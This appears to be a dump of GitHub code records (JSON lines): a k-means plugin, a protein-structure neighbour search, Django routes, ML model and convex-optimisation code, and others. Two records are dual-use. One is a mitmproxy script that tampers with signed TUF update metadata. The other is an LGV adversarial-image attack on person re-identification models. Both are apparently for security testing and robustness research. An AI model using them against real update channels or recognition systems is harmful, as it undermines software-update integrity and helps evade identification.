\"qadd_dot_test\":qadd_dot_test, \"qadd_dot_test_s\":qadd_dot_test_s, \"qadd_test_raw\":qadd_test_raw, \"qadd_dot_test_raw\":qadd_dot_test_raw, \"qadd_dot_test_raw_s\":qadd_dot_test_raw_s, \"T_test\":T_test, \"tadv_dot_test\":tadv_dot_test, \"tadd_dot_test\":tadd_dot_test, \"tadd_dot_test_raw\":tadd_dot_test_raw, \"sw_toa_down_test\":sw_toa_down_test, \"latent_up_test\":latent_up_test, \"sensible_up_test\":sensible_up_test, \"mslp\":mslp_test, \"qadv_dot_test_raw\":qadv_dot_test_raw, \"qadv_dot_test_raw_s\":qadv_dot_test_raw_s,\"qtot_test_raw\":qtot_test_raw, \"qtot_test_raw_s\":qtot_test_raw_s,}\n # test_data_out = { \"qphys_dot_test\":qphys_dot_test, \"qphys_dot_test_s\":qphys_dot_test_s, \"tphys_test\":tphys_test, \"sw_toa_up_test\":sw_toa_up_test, \"low_toa_up_test\":lw_toa_up_test, \"sw_down_test\":sw_down_test, \"lw_down_test\":lw_down_test, \"rain_test\":rain_test, \"snow_test\":snow_test, \"qphys_dot_test_raw\":qphys_dot_test_raw, \"qphys_dot_test_raw_s\":qphys_dot_test_raw_s}\n \n # return train_data_in, train_data_out, test_data_in, test_data_out","repo_name":"omarjamil/caramel","sub_path":"model/torch/jupyter/data_io.py","file_name":"data_io.py","file_ext":"py","file_size_in_byte":13932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72304163920","text":"A = [1,3,5,7]\r\n\r\ni = 1\r\n\r\nfor x in range(0,10) :\r\n i = i + 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nB = [2, 4, 8, 16, 32, 64]\r\ni = 2\r\nfor x in range(0,10) :\r\n i = i * 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nC = [0, 1, 4, 9, 16, 25, 36]\r\ni = 1\r\ny = 3\r\nfor x in range(0,10):\r\n i = i + y\r\n y = y + 2\r\n print(i)\r\nprint(\"=-\" * 30)\r\n\r\nD = [4, 16, 36, 64]\r\n\r\n\r\n\r\natual = 2\r\nproximo = atual*atual\r\nmultiplicador = atual + 2\r\nfor x in range(0,10) :\r\n proximo = atual*atual\r\n multiplicador = atual + 2\r\n atual = multiplicador\r\n print(proximo)\r\nprint(\"=-\" * 30)\r\n\r\nE = [1, 1, 2, 3, 5, 8]\r\n\r\nanterior = 1\r\nproximo = 1\r\nsoma = anterior + proximo\r\n\r\nfor x in range(0,10) :\r\n soma = anterior + proximo\r\n anterior = proximo\r\n proximo = soma\r\n print(soma)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"gabpesouza/desafioEstagio","sub_path":"exercicios_logica.py","file_name":"exercicios_logica.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"75067617681","text":"\"\"\"Calculate K meanss clustering\"\"\"\nfrom plugin import Statistics\nimport wx\nfrom numpy import array\ntry:\n from Pycluster import kcluster\nexcept ImportError:\n from Bio.Cluster import kcluster\n\nclass KMeans(Statistics):\n \"\"\"plugin for calculating kmeans\"\"\"\n name = \"Kmeans\"\n def Main(self, model):\n \"\"\"calculate kmeans\"\"\"\n self.model = model\n data = self.model.GetCurrentData()[:]\n \n nclusters = wx.GetNumberFromUser(\"Kmeans Dialog\",\n \"Enter number of clusters\",\n \"Kmeans nclusters\",\n 1)\n\n z, error, found = kcluster(data, nclusters=nclusters) #IGNORE:W0612\n self.model.NewGroup('Kmeans%02d' % nclusters)\n self.model.hdf5.createArray(self.model.current_group, 'z', array(z))\n self.model.update()\n \n \n","repo_name":"cliburn/flow","sub_path":"src/plugins/statistics/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"71231963603","text":"import sys\n\nfrom mitmproxy import ctx\nfrom mitmproxy.http import HTTPFlow\nfrom random import randrange\n\nfrom api.datatypes.metadata import Metadata\nfrom api.utils import is_metadata\n\n\ndef response(flow: HTTPFlow) -> None:\n if is_metadata(flow):\n ctx.log.info(f\"Randomize the signed version...\")\n else:\n ctx.log.debug(\"skipping non-metadata response...\")\n return\n\n try:\n meta = Metadata.from_flow(flow)\n new_version = randrange(sys.maxsize)\n ctx.log.debug(f\"replacing metadata version {meta.version} with {new_version}\")\n meta.version = new_version\n\n flow.response.headers[\"x-mitm-flow\"] = \"randomize_version\"\n flow.response.content = meta.to_json().encode(\"UTF-8\")\n except Exception as e:\n ctx.log.error(f\"Processing error: {e}\")\n ctx.log.debug(e.__traceback__)\n","repo_name":"advancedtelematic/tuf-mitm-proxy","sub_path":"flows/randomize_version.py","file_name":"randomize_version.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35586503005","text":"#! /usr/bin/python3\n\n\"\"\"\n Determine the list of residues whose CA atoms are closer than 20 Å\n\"\"\"\n\nimport argparse\n\nfrom Bio.PDB.NeighborSearch import NeighborSearch\nfrom Bio.PDB.PDBParser import PDBParser\n\n\ndef atom_id(at):\n \"\"\" Function to build a friendly representation \n of an atom id like ARG A23.CA \n \"\"\"\n res = at.get_parent()\n chain = res.get_parent()\n return \"{} {}{}.{}\".format (res.get_resname(), chain.id, res.id[1], at.id)\n \nparser = argparse.ArgumentParser (\n prog='exercise2', \n description='Getting CA pairs within max dist',\n usage='exercise2.py [options] pdb_file [> output_file]'\n)\n\nparser.add_argument(\n '--maxdist', \n action='store', \n dest='max_dist',\n default=20,\n type=float,\n help='Max contact distance (A)'\n)\n\nparser.add_argument('pdb_file',help='Input PDB', type=open)\n\nargs = parser.parse_args()\n\nfor k, v in vars(args).items():\n print ('{:10}:'.format(k), v)\n\nprint(\"PDB.filename:\", args.pdb_file.name)\n\nparser = PDBParser(PERMISSIVE=1)\n\nprint ('Parsing', args.pdb_file)\n\n# load structure from PDB file of PDB ifle handler\nst = parser.get_structure('STR', args.pdb_file.name)\n\n# collecting CA atoms \nca_atoms=[]\n\nfor at in st.get_atoms():\n if at.id == 'CA':\n ca_atoms.append(at)\n\nprint (len(ca_atoms), 'CA Atoms found')\n\n# Preparing search\nnbsearch = NeighborSearch(ca_atoms)\n\nat_pairs = nbsearch.search_all(args.max_dist)\n\n# Output sorted by atom,serial_number, nbsearch returns ordered pairs\n# Redirect the output with > output_list\nfor at1, at2 in sorted(at_pairs, key=lambda at_pair: at_pair[0].serial_number):\n print (atom_id(at1), \":\", atom_id(at2), at1-at2)\n","repo_name":"jlgelpi/Biophysics2019-20","sub_path":"Session1_Solved/ex2/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38830029597","text":"\"\"\"\nauthor: Huiwang Liu\ne-mail: liuhuiwang1025@outlook.com\n\"\"\"\n\nimport random\nfrom copy import deepcopy\nfrom functools import partial\nfrom pathlib import Path\n\nimport kornia as K\nimport torch\nimport torch.nn as nn\nfrom pytorch_metric_learning.losses import TripletMarginLoss\nfrom pytorch_metric_learning.miners import BatchHardMiner\nfrom torch.utils import data\nfrom torchvision.utils import save_image\nfrom tqdm.auto import tqdm\n\nfrom pytorch_reid_models.reid_models.data import build_train_dataloader\nfrom pytorch_reid_models.reid_models.utils import set_seed, setup_logger\nfrom reid_attack.attacker_base import TransferAttackBase\n\n# 'third_party/torchattacks/wrappers/lgv.py' not availableF\nclass EnsMIFGSM:\n def __init__(\n self,\n random_ens_model,\n eps=8 / 255,\n alpha=1 / 255,\n steps=50,\n decay=1.0,\n # len_kernel=15,\n # nsig=3,\n # resize_rate=0.9,\n # diversity_prob=0.5,\n random_start=True,\n ):\n self.random_ens_model = random_ens_model\n self.random_ens_model.eval()\n self.eps = eps\n self.steps = steps\n self.decay = decay\n self.alpha = alpha\n # self.resize_rate = resize_rate\n # self.diversity_prob = diversity_prob\n self.random_start = random_start\n # self.len_kernel = (len_kernel, len_kernel)\n # self.nsig = (nsig, nsig)\n\n self.device = next(random_ens_model.parameters()).device\n\n # def input_diversity(self, x):\n # img_size = x.shape[-1]\n # img_resize = int(img_size * self.resize_rate)\n\n # if self.resize_rate < 1:\n # img_size = img_resize\n # img_resize = x.shape[-1]\n\n # rnd = torch.randint(\n # low=img_size, high=img_resize, size=(1,), dtype=torch.int32\n # ).item()\n # ratio = x.shape[2] / x.shape[3]\n # rescaled = F.interpolate(\n # x, size=[int(rnd * ratio), rnd], mode=\"bilinear\", align_corners=False\n # )\n # h_rem = int((img_resize - rnd) * ratio)\n # w_rem = img_resize - rnd\n # pad_top = torch.randint(low=0, high=h_rem, size=(1,), dtype=torch.int32).item()\n # pad_bottom = h_rem - pad_top\n # pad_left = torch.randint(low=0, high=w_rem, size=(1,), dtype=torch.int32).item()\n # pad_right = w_rem - pad_left\n\n # padded = F.pad(\n # rescaled,\n # [pad_left, pad_right, pad_top, pad_bottom],\n # value=0,\n # )\n\n # return padded if torch.rand(1) < self.diversity_prob else x\n\n def forward(self, images):\n images = images.detach().to(self.device)\n\n criterion = criterion = partial(\n torch.nn.CosineEmbeddingLoss(), target=torch.ones(1, device=self.device)\n )\n\n momentum = torch.zeros_like(images).detach().to(self.device)\n\n adv_images = images.clone().detach()\n if self.random_start:\n # Starting at a uniformly random point\n adv_images = adv_images + torch.empty_like(adv_images).uniform_(\n -self.eps, self.eps\n )\n adv_images = torch.clamp(adv_images, min=0, max=1).detach()\n\n for _ in range(self.steps):\n adv_images.requires_grad = True\n\n feats_list = self.random_ens_model(images)\n # adv_feats_list = self.random_ens_model(\n # self.input_diversity(adv_images), use_last_models=True\n # )\n adv_feats_list = self.random_ens_model(adv_images, use_last_models=True)\n\n # Calculate loss\n loss = sum(\n [\n criterion(adv_feats, feats)\n for adv_feats, feats in zip(adv_feats_list, feats_list)\n ]\n )\n\n # Update adversarial images\n grad = torch.autograd.grad(\n loss, adv_images, retain_graph=False, create_graph=False\n )[0]\n\n # depth wise conv2d\n # grad = K.filters.gaussian_blur2d(\n # grad, kernel_size=self.len_kernel, sigma=self.nsig\n # )\n grad = grad / torch.mean(torch.abs(grad), dim=(1, 2, 3), keepdim=True)\n grad = grad + momentum * self.decay\n momentum = grad\n\n adv_images = adv_images.detach() + self.alpha * grad.sign()\n delta = torch.clamp(adv_images - images, min=-self.eps, max=self.eps)\n adv_images = torch.clamp(images + delta, min=0, max=1).detach()\n\n return adv_images\n\n def __call__(self, images):\n return self.forward(images)\n\n\nclass RandomEnsModel(torch.nn.Module):\n def __init__(self, models_list, ens_num=1):\n super().__init__()\n self.models = torch.nn.ModuleList(models_list)\n self.ens_num = ens_num\n # Calculating clean features and adversarial features requires\n # ensuring that the models are the same\n self.last_indexes = None\n\n def forward(self, x, use_last_models=False):\n if use_last_models:\n assert self.last_indexes is not None\n indexes = self.last_indexes\n else:\n indexes = random.sample(range(len(self.models)), self.ens_num)\n self.last_indexes = indexes\n\n feats_list = [self.models[i](x) for i in indexes]\n\n return feats_list\n\n\nclass LGVAttack(TransferAttackBase):\n def _random_start(self, imgs, eps):\n imgs = imgs + torch.empty_like(imgs).uniform_(-eps, eps)\n imgs = torch.clamp(imgs, min=0, max=1).detach()\n return imgs\n\n def generate_adv(self, q_dataset, agent_model, g_dataset=None):\n collect_models = self.lgv_collect_models(\n agent_model, train_dataset_name=q_dataset.name\n )\n for model in collect_models:\n model.eval().requires_grad_(False)\n\n random_ens_model = RandomEnsModel(collect_models, ens_num=1)\n\n eps = 8 / 255\n attack = EnsMIFGSM(\n random_ens_model, eps=eps, alpha=1 / 255, steps=50, decay=1.0\n )\n\n all_adv_imgs, all_pids, all_camids = [], [], []\n q_dataloader = data.DataLoader(q_dataset, batch_size=32, num_workers=8)\n for imgs, pids, camids in tqdm(q_dataloader, desc=\"Generate adv\", leave=False):\n imgs, pids, camids = imgs.cuda(), pids.cuda(), camids.cuda()\n adv_imgs = attack(imgs)\n all_adv_imgs.append(adv_imgs.cpu())\n all_pids.append(pids.cpu())\n all_camids.append(camids.cpu())\n all_adv_imgs = torch.cat(all_adv_imgs)\n all_pids = torch.cat(all_pids)\n all_camids = torch.cat(all_camids)\n\n return data.TensorDataset(all_adv_imgs, all_pids, all_camids)\n\n @staticmethod\n def lgv_collect_models(\n agent_model, train_dataset_name, epoch=10, nb_models_epoch=4, lr=5e-2\n ):\n models_list = []\n models_path = Path(\"/tmp/lgv_models.pth\")\n if models_path.exists():\n state_dict_list = torch.load(models_path, map_location=\"cpu\")\n assert len(state_dict_list) == epoch * nb_models_epoch\n for state in state_dict_list:\n model = deepcopy(agent_model)\n model.eval().requires_grad_(False)\n model.load_state_dict(state)\n models_list.append(model)\n else:\n # Construct training data\n train_dataloader = build_train_dataloader(\n dataset_names=[train_dataset_name],\n per_dataset_num=None,\n transforms=[\"randomflip\"],\n batch_size=64,\n sampler=\"pk\",\n num_instance=8,\n )\n\n # Fine-tuning model\n model = deepcopy(agent_model)\n optimizer = torch.optim.SGD(\n model.parameters(),\n lr=lr,\n momentum=0.9,\n weight_decay=1e-4,\n )\n\n # Loss function\n miner = BatchHardMiner()\n criterion_t = TripletMarginLoss(margin=0.3)\n criterion_x = nn.CrossEntropyLoss(label_smoothing=0.1)\n\n # Start fine-tuning\n for e in range(epoch):\n model.train()\n save_points = torch.linspace(\n 0,\n len(train_dataloader) - 1,\n steps=nb_models_epoch + 1,\n dtype=torch.int64,\n )[1:]\n for i, (imgs, pids, _) in enumerate(\n tqdm(train_dataloader, desc=f\"Epoch {e}\", leave=False)\n ):\n imgs, pids = imgs.cuda(), pids.cuda()\n logits, feats = model(imgs)\n\n # FIXME: The pid relabel does not match the original model training code\n # (We tried adding the correct matching version of xent loss and the result was worse)\n # loss_x = criterion_x(logits, pids)\n hard_pairs = miner(feats, pids)\n loss_t = criterion_t(feats, pids, hard_pairs)\n # loss = loss_x + loss_t\n loss = loss_t\n\n optimizer.zero_grad(True)\n loss.backward()\n optimizer.step()\n\n if i in save_points:\n save_model = deepcopy(model)\n models_list.append(save_model)\n\n # Save model\n torch.save([m.state_dict() for m in models_list], models_path)\n\n return models_list\n\n\ndef main():\n setup_logger(name=\"pytorch_reid_models.reid_models\")\n setup_logger(name=\"__main__\")\n\n set_seed(42)\n\n LGVAttack().run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HWliiu/RobustReidResearch","sub_path":"reid_attack/lgv_attack.py","file_name":"lgv_attack.py","file_ext":"py","file_size_in_byte":9693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23532473037","text":"import torch\n\nfrom torch import nn\n\nfrom pythia.common.registry import registry\nfrom pythia.models.base_model import BaseModel\nfrom pythia.modules.layers import ConvNet, Flatten\n\n\n_TEMPLATES = {\n \"question_vocab_size\": \"{}_text_vocab_size\",\n \"number_of_answers\": \"{}_num_final_outputs\"\n}\n\n_CONSTANTS = {\n \"hidden_state_warning\": \"hidden state (final) should have 1st dim as 2\"\n}\n\n\n@registry.register_model(\"cnn_lstm\")\nclass CNNLSTM(BaseModel):\n \"\"\"CNNLSTM is a simple model for vision and language tasks. CNNLSTM is supposed to act\n as a baseline to test out your stuff without any complex functionality. Passes image\n through a CNN, and text through an LSTM and fuses them using concatenation. Then, it finally\n passes the fused representation from a MLP to generate scores for each of the possible answers.\n\n Args:\n config (ConfigNode): Configuration node containing all of the necessary config required\n to initialize CNNLSTM.\n\n Inputs: sample_list (SampleList)\n - **sample_list** should contain image attribute for image, text for question split into\n word indices, targets for answer scores\n \"\"\"\n def __init__(self, config):\n super().__init__(config)\n self._global_config = registry.get(\"config\")\n self._datasets = self._global_config.datasets.split(\",\")\n\n def build(self):\n assert len(self._datasets) > 0\n num_question_choices = registry.get(\n _TEMPLATES[\"question_vocab_size\"].format(self._datasets[0])\n )\n num_answer_choices = registry.get(\n _TEMPLATES[\"number_of_answers\"].format(self._datasets[0])\n )\n\n self.text_embedding = nn.Embedding(\n num_question_choices, self.config.text_embedding.embedding_dim\n )\n self.lstm = nn.LSTM(**self.config.lstm)\n\n layers_config = self.config.cnn.layers\n conv_layers = []\n for i in range(len(layers_config.input_dims)):\n conv_layers.append(\n ConvNet(\n layers_config.input_dims[i],\n layers_config.output_dims[i],\n kernel_size=layers_config.kernel_sizes[i]\n )\n )\n conv_layers.append(Flatten())\n self.cnn = nn.Sequential(*conv_layers)\n\n self.classifier = nn.Linear(self.config.classifier.input_dim, num_answer_choices)\n\n def forward(self, sample_list):\n self.lstm.flatten_parameters()\n\n question = sample_list.text\n image = sample_list.image\n\n # Get (h_n, c_n), last hidden and cell state\n _, hidden = self.lstm(self.text_embedding(question))\n # X x B x H => B x X x H where X = num_layers * num_directions\n hidden = hidden[0].transpose(0, 1)\n\n # X should be 2 so we can merge in that dimension\n assert hidden.size(1) == 2, _CONSTANTS[\"hidden_state_warning\"]\n\n hidden = torch.cat([hidden[:, 0, :], hidden[:, 1, :]], dim=-1)\n image = self.cnn(image)\n\n # Fuse into single dimension\n fused = torch.cat([hidden, image], dim=-1)\n scores = self.classifier(fused)\n\n\n return {\"scores\": scores}\n","repo_name":"microsoft/TAP","sub_path":"pythia/models/cnn_lstm.py","file_name":"cnn_lstm.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"3"} +{"seq_id":"25620144465","text":"from django.urls import path\nfrom .views import MoveListView,DramaListView,ActionListView,AnimationListView,DramaDetailView,ActionDetailView,AnimationDetailView\nurlpatterns = [\n path('', MoveListView.as_view(), name='move_list'),\n path('Drama/', DramaListView.as_view(),name='Drama_list'),\n path('Action/', ActionListView.as_view(),name='Action_list'),\n path('Animation/', AnimationListView.as_view(),name='Animation_list'),\n path('Drama//', DramaDetailView.as_view(),name='Drama_detail'),\n path('Action//', ActionDetailView.as_view(),name='Action_detail'),\n path('Animation//', AnimationDetailView.as_view(),name='Animation_detail')\n\n] ","repo_name":"WalaaAtiah/drf-api-permissions-postgres","sub_path":"Movies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5943948389","text":"import abc\nimport contextlib\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_mri.python.ops import array_ops\nfrom tensorflow_mri.python.util import deprecation\nfrom tensorflow_mri.python.ops import linalg_ops\nfrom tensorflow_mri.python.ops import math_ops\nfrom tensorflow_mri.python.util import api_util\nfrom tensorflow_mri.python.util import check_util\nfrom tensorflow_mri.python.util import linalg_ext\nfrom tensorflow_mri.python.util import linalg_imaging\nfrom tensorflow_mri.python.util import tensor_util\n\n\n@api_util.export(\"convex.ConvexFunction\")\nclass ConvexFunction():\n r\"\"\"Base class defining a [batch of] convex function[s].\n\n Represents a closed proper convex function\n :math:`f : \\mathbb{R}^{n}\\rightarrow \\mathbb{R}` or\n :math:`f : \\mathbb{C}^{n}\\rightarrow \\mathbb{R}`.\n\n Subclasses should implement the `_call` and `_prox` methods to define the\n forward pass and the proximal mapping, respectively. Gradients are\n provided by TensorFlow's automatic differentiation feature.\n\n This class exposes three properties to get static shape information:\n\n * `shape`: The static shape. Calls `_shape`.\n * `domain_dimension`: The static domain dimension, equal to `shape[-1]`.\n * `batch_shape`: The static batch shape, equal to `shape[:-1]`.\n\n Additionally there are three equivalent methods to get dynamic shape\n information:\n\n * `shape_tensor`: The dynamic shape. Calls `_shape_tensor`.\n * `domain_dimension_tensor`: The dynamic domain dimension, equal to\n `shape_tensor()[-1]`.\n * `batch_shape_tensor`: The dynamic batch shape, equal to\n `shape_tensor()[:-1]`.\n\n Subclasses may implement the methods `_shape` and `_shape_tensor` to provide\n custom static and dynamic shape information, respectively.\n \"\"\"\n def __init__(self,\n domain_dimension=None,\n scale=None,\n dtype=None,\n name=None):\n \"\"\"Initialize this `ConvexFunction`.\"\"\"\n if isinstance(domain_dimension, tf.compat.v1.Dimension):\n domain_dimension = domain_dimension.value\n self._domain_dimension = check_util.validate_rank(\n domain_dimension, 'domain_dimension', accept_none=True)\n\n self._dtype = tf.dtypes.as_dtype(dtype or tf.dtypes.float32)\n self._name = name or type(self).__name__\n\n if scale is None:\n scale = 1.0\n self._scale = tf.convert_to_tensor(scale, dtype=self.dtype.real_dtype)\n\n def __call__(self, x):\n return self.call(x)\n\n def call(self, x, name=None):\n \"\"\"Evaluate this `ConvexFunction` at input point[s] `x`.\n\n Args:\n x: A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n name: A name for this operation (optional).\n\n Returns:\n A `tf.Tensor` of shape `[...]` and same dtype as `self`.\n \"\"\"\n with self._name_scope(name or \"call\"):\n x = tf.convert_to_tensor(x, name=\"x\")\n self._check_input_shape(x)\n self._check_input_dtype(x)\n return self._call(x)\n\n def prox(self, x, scale=None, name=None, **kwargs):\n \"\"\"Evaluate the proximal operator of this `ConvexFunction` at point[s] `x`.\n\n Args:\n x: A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n scale: A scalar `float`. Additional scaling factor.\n name: A name for this operation (optional).\n **kwargs: A `dict`. Additional keyword arguments to pass to `_prox`.\n\n Returns:\n A `tf.Tensor` of shape `[..., n]` and same dtype as `self`.\n \"\"\"\n with self._name_scope(name or \"prox\"):\n x = tf.convert_to_tensor(x, name=\"x\")\n self._check_input_shape(x)\n self._check_input_dtype(x)\n return self._prox(x, scale=scale, **kwargs)\n\n def conj(self, name=None):\n \"\"\"Returns the convex conjugate of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A `ConvexFunction` which represents the convex conjugate of `self`.\n \"\"\"\n with self._name_scope(name or \"conj\"):\n return self._conj()\n\n def shape_tensor(self, name=None):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"shape_tensor\"):\n # Prefer to use statically defined shape if available.\n if self.shape.is_fully_defined():\n return tensor_util.convert_shape_to_tensor(\n self.shape.as_list(), name=\"shape\")\n return self._shape_tensor()\n\n def domain_dimension_tensor(self, name=None):\n \"\"\"Returns the dynamic domain dimension of this `ConvexFunction`.\n\n Subclasses get this for free once they implement `_shape_tensor`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A scalar integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"domain_dimension_tensor\"):\n # Prefer to use statically defined domain_dimension if available.\n if isinstance(self.domain_dimension, int):\n return tf.constant(self.domain_dimension, dtype=tf.int32)\n return self.shape_tensor()[-1]\n\n @deprecation.deprecated(\n '2022-08-07', 'Use `ConvexFunction.domain_dimension_tensor` instead.')\n def ndim_tensor(self, name=None): # pylint: disable=unused-argument\n \"\"\"Returns the dynamic domain dimension of this `ConvexFunction`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A scalar integer `tf.Tensor`.\n \"\"\"\n return self.domain_dimension_tensor()\n\n def batch_shape_tensor(self, name=None):\n \"\"\"Returns the dynamic batch shape of this `ConvexFunction`.\n\n Subclasses get this for free once they implement `_shape_tensor`.\n\n Args:\n name: A name for this operation (optional).\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n with self._name_scope(name or \"batch_shape_tensor\"):\n # Prefer to use statically defined shape if available.\n if self.batch_shape.is_fully_defined():\n return tensor_util.convert_shape_to_tensor(\n self.batch_shape.as_list(), name=\"shape\")\n return self.shape_tensor()[:-1]\n\n @abc.abstractmethod\n def _call(self, x):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_call` is not implemented.\")\n\n def _prox(self, x, scale=None):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_prox` is not implemented.\")\n\n def _conj(self):\n # Must be implemented by subclasses.\n raise NotImplementedError(\"Method `_conj` is not implemented.\")\n\n def _shape(self):\n \"\"\"Returns the static shape of this `ConvexFunction`.\n\n Has a default implementation based on the domain dimension.\n\n Returns:\n A `tf.TensorShape`.\n \"\"\"\n return tf.TensorShape([self._domain_dimension])\n\n def _shape_tensor(self):\n \"\"\"Returns the dynamic shape of this `ConvexFunction`.\n\n Returns:\n A 1D integer `tf.Tensor`.\n \"\"\"\n raise NotImplementedError(\"`_shape_tensor` is not implemented.\")\n\n @property\n def scale(self):\n \"\"\"The scaling factor.\"\"\"\n return self._scale\n\n @property\n def shape(self):\n \"\"\"The static shape of this `ConvexFunction`.\"\"\"\n return self._shape()\n\n @property\n def domain_dimension(self):\n \"\"\"The static domain dimension of this `ConvexFunction`.\"\"\"\n return self.shape[-1]\n\n @property\n def batch_shape(self):\n \"\"\"The static batch shape of this `ConvexFunction`.\"\"\"\n return self.shape[:-1]\n\n @property\n def dtype(self):\n \"\"\"The `DType` of `Tensors` handled by this `ConvexFunction`.\"\"\"\n return self._dtype\n\n @property\n def name(self):\n \"\"\"Name prepended to all ops created by this `ConvexFunction`.\"\"\"\n return self._name\n\n @contextlib.contextmanager\n def _name_scope(self, name=None):\n \"\"\"Helper function to standardize op scope.\"\"\"\n full_name = self.name\n if name is not None:\n full_name += \"/\" + name\n with tf.name_scope(full_name) as scope:\n yield scope\n\n def _check_input_shape(self, arg): # pylint: disable=missing-param-doc\n \"\"\"Check that arg.shape[-1] is compatible with self.domain_dimension.\"\"\"\n if arg.shape.rank is None:\n raise ValueError(\n \"Expected argument to have known rank, but found: {} \"\n \"in tensor {}\".format(arg.shape.rank, arg))\n if arg.shape.rank < 1:\n raise ValueError(\n \"Expected argument to have rank >= 1, but found: {} \"\n \"in tensor {}\".format(arg.shape.rank, arg))\n if not arg.shape[-1:].is_compatible_with([self.domain_dimension]):\n raise ValueError(\n \"Expected argument to have last dimension {}, but found: {} in \"\n \"tensor {}\".format(self.domain_dimension, arg.shape[-1], arg))\n\n def _check_input_dtype(self, arg):\n \"\"\"Check that arg.dtype == self.dtype.\"\"\"\n if arg.dtype.base_dtype != self.dtype:\n raise TypeError(\n \"Expected argument to have dtype {}, but found: {} \"\n \"in tensor {}\".format(self.dtype, arg.dtype, arg))\n\n\n@api_util.export(\"convex.ConvexFunctionAffineMappingComposition\")\nclass ConvexFunctionAffineMappingComposition(ConvexFunction):\n \"\"\"Composes a convex function and an affine mapping.\n\n Represents :math:`f(Ax + b)`, where :math:`f` is a `ConvexFunction`,\n :math:`A` is a `LinearOperator` and :math:`b` is a constant `Tensor`.\n\n Args:\n function: A `ConvexFunction`.\n operator: A `LinearOperator`. Defaults to the identity.\n constant: A `Tensor`. Defaults to 0.\n scale: A `float`. A scaling factor.\n name: A name for this operation.\n \"\"\"\n def __init__(self,\n function,\n operator=None,\n constant=None,\n scale=None,\n name=None):\n domain_dimension = (operator.domain_dimension if operator is not None\n else function.domain_dimension)\n super().__init__(domain_dimension=domain_dimension,\n scale=scale,\n dtype=function.dtype,\n name=name)\n self._function = function\n self._operator = operator\n self._constant = constant\n\n def _call(self, x):\n if self._operator is not None:\n x = self._operator.matvec(x)\n if self._constant is not None:\n x += self._constant\n return self._scale * self._function._call(x) # pylint: disable=protected-access\n\n def _prox(self, x, scale=None):\n # Prox difficult to evaluate for general linear operators.\n # TODO(jmontalt): implement prox for specific cases such as orthogonal\n # operators.\n raise NotImplementedError(\n f\"The proximal operator of {self.name} is not implemented or \"\n f\"does not have a closed form expression.\")\n\n @property\n def function(self):\n return self._function\n\n @property\n def operator(self):\n return self._operator\n\n @property\n def constant(self):\n return self._constant\n\n\n@api_util.export(\"convex.ConvexFunctionLinearOperatorComposition\")\nclass ConvexFunctionLinearOperatorComposition( # pylint: disable=abstract-method\n ConvexFunctionAffineMappingComposition):\n r\"\"\"Composes a convex function and a linear operator.\n\n Represents :math:`f(Ax)`, where :math:`f` is a `ConvexFunction` and\n :math:`A` is a `LinearOperator`.\n\n Args:\n function: A `ConvexFunction`.\n operator: A `LinearOperator`. Defaults to the identity.\n scale: A `float`. A scaling factor.\n name: A name for this operation.\n \"\"\"\n def __init__(self,\n function,\n operator=None,\n scale=None,\n name=None):\n super().__init__(function,\n operator=operator,\n scale=scale,\n name=name)\n\n\n@api_util.export(\"convex.ConvexFunctionIndicatorBall\")\nclass ConvexFunctionIndicatorBall(ConvexFunction): # pylint: disable=abstract-method\n \"\"\"A `ConvexFunction` representing the indicator function of an Lp ball.\n\n Args:\n domain_dimension: A scalar integer `tf.Tensor`. The dimension of the domain.\n order: A `float`. The order of the norm. Supported values are `1`, `2`,\n `np.inf`.\n scale: A `float`. A scaling factor. Defaults to 1.0.\n dtype: A `tf.dtypes.DType`. The type of this `ConvexFunction`. Defaults to\n `tf.dtypes.float32`.\n name: A name for this `ConvexFunction`.\n \"\"\"\n def __init__(self,\n domain_dimension,\n order,\n scale=None,\n dtype=None,\n name=None):\n super().__init__(scale=scale, dtype=dtype, name=name)\n self._order = check_util.validate_enum(order, [1, 2, np.inf], name='order')\n\n self._domain_dimension_static, self._domain_dimension_dynamic = (\n _get_static_and_dynamic_dimension(domain_dimension))\n\n def _call(self, x):\n # Note that the scale has no effect, as the indicator function is always\n # zero or infinity.\n return math_ops.indicator_ball(x, order=self._order)\n\n def _prox(self, x, scale=None):\n # The proximal operator of the indicator function of a closed convex set\n # (such as the Lp ball) is the projection onto the set.\n return math_ops.project_onto_ball(x, order=self._order)\n\n def _conj(self):\n # The convex conjugate of the indicator function on the unit ball defined\n # by the Lp-norm is the dual norm function.\n return ConvexFunctionNorm(\n domain_dimension=self.domain_dimension,\n 